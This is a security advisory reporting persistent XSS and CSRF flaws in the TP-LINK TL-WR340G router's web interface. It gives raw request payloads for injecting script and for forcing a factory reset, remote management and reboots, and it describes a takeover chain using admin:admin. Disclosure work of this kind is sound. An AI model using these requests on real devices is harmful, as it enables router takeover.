1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183 | #Title: TP-LINK Model No. TL-WR340G/TL-WR340GD - Multiple Vulnerabilities
#Date: 01.07.14
#Vendor: TP-LINK
#Affected versions: TL-WR340G/TL-WR340GD
#Tested on: Firmware Version - 4.3.7 Build 090901 Rel.61899n, Hardware Version - WR340G v5 081520C2 [at] Linux
#Contact: smash [at] devilteam.pl
Persistent Cross Site Scripting vulnerabilities exists because of poor parameters filtration. Our value is stored in javascript array, since it's not correctly verified nor filtered, it is able to inject javascript code. It will be executed whenever user will visit specific settings page. Because of no CSRF prevention, it is able to compromise router. Attacker may force user to restore factory default settings, and then to turn on remote managment; in result, it will be able to log in using default username and password (admin:admin).
Config file - 192.168.1.1/userRpm/config.bin
#1 - Cross Site Scripting
a) Persistent XSS in Network > WAN Settings
Vulnerable parameter - hostName.
Request:
GET /userRpm/WanDynamicIpCfgRpm.htm?wantype=Dynamic+IP&hostName=%3C/script%3E%3Cscript%3Ealert(123)%3C/script%3E&mtu=1500&Save=Save HTTP/1.1
Host: 192.168.1.1
Response:
HTTP/1.1 200 OK
Server: Router
Connection: close
Content-Type: text/html
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
<SCRIPT language="javascript" type="text/javascript">
var dhcpInf = new Array(
1,
(...)
"</script><script>alert(123)</script>",
0,0 );
</SCRIPT>
(...)
b) Persitent XSS in Wireless Settings
Vulnerable parameter - ssid.
Request:
GET /userRpm/WlanNetworkRpm.htm?ssid=%3C%2Fscript%3Exssed%3C%3E®ion=102&channel=6&mode=2&ap=2&broadcast=2&secType=1&secOpt=3&keytype=1&key1=&length1=0&key2=&length2=0&key3=&length3=0&key4=&length4=0&Save=Save HTTP/1.1
Host: 192.168.1.1
Response:
HTTP/1.1 200 OK
Server: Router
Connection: close
Content-Type: text/html
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
<SCRIPT language="javascript" type="text/javascript">
var wlanPara = new Array(
5, 0, "</script>xssed<>", 114, 102, 1, 6, 2, 1, 1, 0, "", "", "", "", "", "", 0, 1, "333", 1, "11", 1, "0.0.0.0", 1812, "", "", 86400, 86400, 1,
0,0 );
</SCRIPT>
(...)
c) Persistent XSS in DHCP Settings
Vulnerable parameter - domain.
Request:
GET /userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=</script><xssed>'"&dnsserver=0.0.0.0&dnsserver2=0.0.0.0&Save=Save HTTP/1.1
Host: 192.168.1.1
Referer: http://192.168.1.1/userRpm/LanDhcpServerRpm.htm
Response:
HTTP/1.1 200 OK
Server: Router
Connection: close
Content-Type: text/html
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
<SCRIPT language="javascript" type="text/javascript">
var DHCPPara = new Array(
1,
"192.168.1.100",
"192.168.1.199",
120,
"0.0.0.0",
"</script><xssed>'\"",
"0.0.0.0",
"0.0.0.0",
1,
1,
0,0 );
</SCRIPT>
(...)
d) Persitent XSS in Security > Domain Filtering
Vulnerable parameter - domain; value is being validated by js to prevent illegal characters in domain name. It is able to avoid this filtration by sending raw http request.
Request:
GET /userRpm/DomainFilterRpm.htm?begintime=0000&endtime=2400&domain=hm</script><xssed>'"&State=1&Changed=1&SelIndex=0&Page=1&Save=Save HTTP/1.1
Host: 192.168.1.1
Response:
HTTP/1.1 200 OK
Server: Router
Connection: close
Content-Type: text/html
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
<SCRIPT language="javascript" type="text/javascript">
var domainFilterList = new Array(
"0000-2400", "hm</script><xssed>'\"", 1,
0,0 );
</SCRIPT>
(...)
e) Persistent XSS in Dynamic DNS Settings
Vulnerable parameters - username & cliUrl.
Request:
GET /userRpm/DynDdnsRpm.htm?provider=2&username=&pwd=&cliUrl=</script><script>alert(123)</script>&Save=Save HTTP/1.1
Host: 192.168.1.1
Response:
HTTP/1.1 200 OK
Server: Router
Connection: close
Content-Type: text/html
WWW-Authenticate: Basic realm="TP-LINK Wireless Router WR340G"
<SCRIPT language="javascript" type="text/javascript">
var serInf = new Array(
"",
"",
"</script><script>alert(123)</script>",
0,
0,
2,
2,
0,
1,
0,0 );
</SCRIPT>
(...)
#2 - CSRF
a) Change LAN IP
Parameter lanip stands for further ip.
GET /userRpm/NetworkLanCfgRpm.htm?lanip=192.168.1.2&lanmask=255.255.255.0&Save=Save HTTP/1.1
Host: 192.168.1.1
b) Change remote managment settings
GET /userRpm/ManageControlRpm.htm?port=80&ip=0.0.0.0&Save=Save HTTP/1.1
Host: 192.168.1.1
c) Clear syslog
GET /userRpm/SystemLogRpm.htm?Clearlog=Clear+All HTTP/1.1
Host: 192.168.1.1
d) Reboot device
GET /userRpm/SysRebootRpm.htm?Reboot=Reboot HTTP/1.1
Host: 192.168.1.1
e) Restore factory defaults (admin:admin)
GET /userRpm/RestoreDefaultCfgRpm.htm?Restorefactory=Restore HTTP/1.1
Host: 192.168.1
|